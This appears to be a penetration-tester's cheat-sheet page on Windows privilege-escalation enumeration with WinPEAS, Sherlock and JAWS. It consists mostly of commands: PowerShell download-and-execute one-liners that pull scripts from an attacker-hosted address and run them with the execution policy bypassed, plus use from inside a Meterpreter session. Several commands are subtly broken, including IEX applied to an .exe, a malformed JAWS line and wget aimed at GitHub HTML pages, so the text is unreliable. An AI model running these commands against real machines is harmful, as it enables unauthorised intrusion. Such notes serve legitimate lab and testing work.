Automated scripts

#WinPEAS

sudo git clone https://github.com/carlospolop/PEASS-ng.git

#grab the winpeas.exe binary and transfer to target

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/WinPEAS.exe');Invoke-AllChecks"

#Sherlock.ps1

wget https://github.com/rasta-mouse/Sherlock/blob/master/Sherlock.ps1 -o sherlock.ps1

#or:

git clone https://github.com/rasta-mouse/Sherlock.git
cd Sherlock
python3 -m http.server 8888

#Deploy:

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Sherlock.ps1');Find-AllVulns"

#From within meterpreter session:

load powershell
powershell_import 'Sherlock.ps1'
powershell_execute "Find-allvulns"

#From within a powershell session

Set-ExecutionPolicy -ExecutionPolicy bypass -Scope CurrentUser
Import-module -Name C:\Users\redcliff\Downloads\Sherlock.ps1
Find-AllVulns

#jaws.ps1

wget https://github.com/411Hall/JAWS/blob/master/jaws-enum.ps1 -o jaws.ps1

#Deploy:

powershell.exe -ep bypass -c "IEX(New-Object Net.WebClient)DownloadFile('http://10.10.10.10:8000/jaws.ps1','C:\Windows\Temp\jaws.ps1')""

#Run from within CMD shell and write out to file.

CMD C:\temp> powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

#Run from within PS Shell and write out to file.

PS C:\temp> .\jaws-enum.ps1 -OutputFileName Jaws-Enum.txt

PreviousWindows enumeration NextWordpress privesc

Last updated 2 years ago